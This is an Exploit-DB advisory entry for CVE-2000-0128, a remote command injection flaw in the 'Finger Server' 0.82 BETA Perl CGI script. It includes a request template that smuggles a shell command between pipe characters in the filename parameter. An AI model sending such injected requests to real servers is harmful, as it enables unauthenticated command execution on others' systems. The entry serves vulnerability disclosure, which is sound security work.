Daniel Beckham The Finger Server 0.82 BETA Pipe Vulnerability

2000-02-04T00:00:00
ID EDB-ID:19745
Type exploitdb
Reporter Iain Wade
Modified 2000-02-04T00:00:00

Description

Daniel Beckham The Finger Server 0.82 BETA Pipe Vulnerability. CVE-2000-0128. Remote exploit for cgi platform

                                        
                                            source: http://www.securityfocus.com/bid/974/info

'The Finger Server' is a perl script for providing .plan-like functionality through a website. Due to insufficient input checking it is possible for remote unauthenticated users to execute shell commands on the server which will run with the priveleges of the webserver. 

A request like:
http ://target/finger.cgi?action=archives&cmd=specific
&filename=99.10.28.15.23.username.|<shell command>|
(split for readability)
will cause the server to execute whatever command is specified.